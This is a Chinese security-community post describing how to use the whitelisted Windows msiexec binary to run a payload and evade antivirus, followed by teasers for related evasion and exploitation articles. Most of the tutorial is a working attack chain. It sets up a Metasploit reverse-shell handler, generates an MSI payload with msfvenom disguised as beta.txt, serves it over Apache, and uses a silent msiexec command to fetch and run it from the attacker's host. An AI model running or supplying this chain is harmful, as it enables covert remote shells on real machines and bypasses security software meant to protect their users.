网安 - 专业的网络安全产业、社区、知识平台

白名单Msiexec执行payload方式!

VSole2023-02-13 10:57:30

msiexec是非常重要的操作系统组件,通常用来安装Windows Installer安装包,而且msiexec支持远程加载msi程序功能,因此可以通过msiexec加载远程的恶意msi程序,实现免杀的效果。其它的白名单执行payload包括:Wmic、Mshta.exe、 Regsvr32、Regsvcs、Regasm、 Rundll32、PsExec、 Cmstp.exe等。

MSF监听设置

>> use exploit/multi/handler>> set lhost 192.168.146.130>> set lport 9998>> set payload windows/x64/shell/reverse_tcp>> exploit -j

     

msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.146.130  LPORT=9998 -f msi > beta.txt

开启web服务,将beta.txt移动到web服务的根目录

>> sudo service apache2 start>> sudo mv beta.txt /var/www/html/

 msiexecXEC执行Payload

C:\Windows\System32\msiexec.exe /q /i http://192.168.146.130/beta.txt

payload白名单
本作品采用《CC 协议》,转载必须注明作者和本文链接
白名单Msiexec执行payload方式!
2023-02-13 10:57:30
msiexec是非常重要的操作系统组件,通常用来安装Windows Installer安装包,而且msiexec支持远程加载msi程序功能,因此可以通过msiexec加载远程的恶意msi程序,实现免杀的效果。
MSF+生成流量免杀木马
2022-01-14 11:34:16
在实战中,即便你绕过了杀毒软件的检测,也很有可能会结束在某些流量监控的设备上。MSF可以说其是每一个内网玩家的必用工具。理所当然,这款工具也自然而然地被各大安全厂商分析,捕捉其在命令执行时产生的数据和流量。当我们使用一个没有做过加密处理的原版工具时,内网中的安全设备会根据我们的流量特征进行判断,认定我们为恶意进程,从而导致控制中断。Meterpreter技巧生成后门msfvenom?
sqlps.exe白名单的利用
2022-03-24 17:02:03
0x01 sqlps.exe简介 sqlps.exe是SQL Server附带的一个具有Microsoft签名的二进制文件,用于加载SQL Server cmdlet,Microsoft Visual C#开发,可用ILSpy反编译查看源代码。 Microsoft SQL Server\100和110是Powershell v2,120和130是Powershell v4。2016中已由SQL
sqlps.exe白名单的利用(过S60!)
2022-05-23 08:07:11
0x01 sqlps.exe简介sqlps.exe是SQL Server附带的一个具有Microsoft签名的二进制文件,用于加载SQL Server cmdlet,Microsoft Visual C#开发,可用ILSpy反编译查看源代码。
域渗透 | SMB的原理与外部C2的应用
2022-06-27 11:03:57
SMB Beacon 与命名管道在 Windows 中,无管理员权限的情况下,即无法添加白名单。定义特定版本的协议的消息数据包集称为方言。进行身份验证后,用户可以访问服务器上不受共享级别安全性保护的所有共享。
PHP环境绕过360执行马儿上线
2022-03-11 16:50:15
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。0x01 前言前几天群里有个老哥私聊我问了个问题,phpStudy搭建的Web环境,
fastjson 漏洞的发现与测试
2022-01-05 20:00:05
Fastjson 是阿里巴巴公司开源的一款 json 解析器,其性能优越,被广泛应用于各大厂商的 Java 项目中。fastjson 于 1.2.24 版本后增加了反序列化白名单,而在 1.2.48 以前的版本中,攻击者可以利用特殊构造的 json 字符串绕过白名单检测,成功执行任意命令。
Fastjson 漏洞的发现与测试
2021-12-03 15:40:17
Fastjson 是阿里巴巴公司开源的一款 json 解析器,其性能优越,被广泛应用于各大厂商的 Java 项目中。fastjson 于 1.2.24 版本后增加了反序列化白名单,而在 1.2.48 以前的版本中,攻击者可以利用特殊构造的 json 字符串绕过白名单检测,成功执行任意命令。
绕过不能执行大部分系统命令和微软杀毒
2021-10-14 08:45:11
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。公司项目,全程打码,已经拿下webshell,提权。无意中发现,php禁止的其实都属于php函数,但是asp和aspx跟php是不同的。传asp、 aspx大马访问都是500,传了一个asp的冰蝎。
autoSSRF:一款基于上下文的智能SSRF漏洞扫描工具
2022-11-21 10:59:41
autoSSRF是一款功能强大的智能化SSRF漏洞扫描工具,该工具基于上下文识别漏洞,并且适用于大规模扫描任务。GET参数进行智能化模糊测试在进行模糊测试时,autoSSRF只会针对跟SSRF相关的常见参数进行测试,并且不会干扰其他功能。fileURL=https://authorizedhost.com),autoSSRF将会把authorizedhost.com识别为一个Web应用程序中的潜在白名单主机,并基于已知信息动态生成Payload,然后尝试绕过白名单验证。除此之外,该工具还会确保几乎零误报。该工具的检测功能依赖于interactsh项目,因此autoSSRF能够识别出站DNS/HTTP交互信息。?
VSole
网络安全专家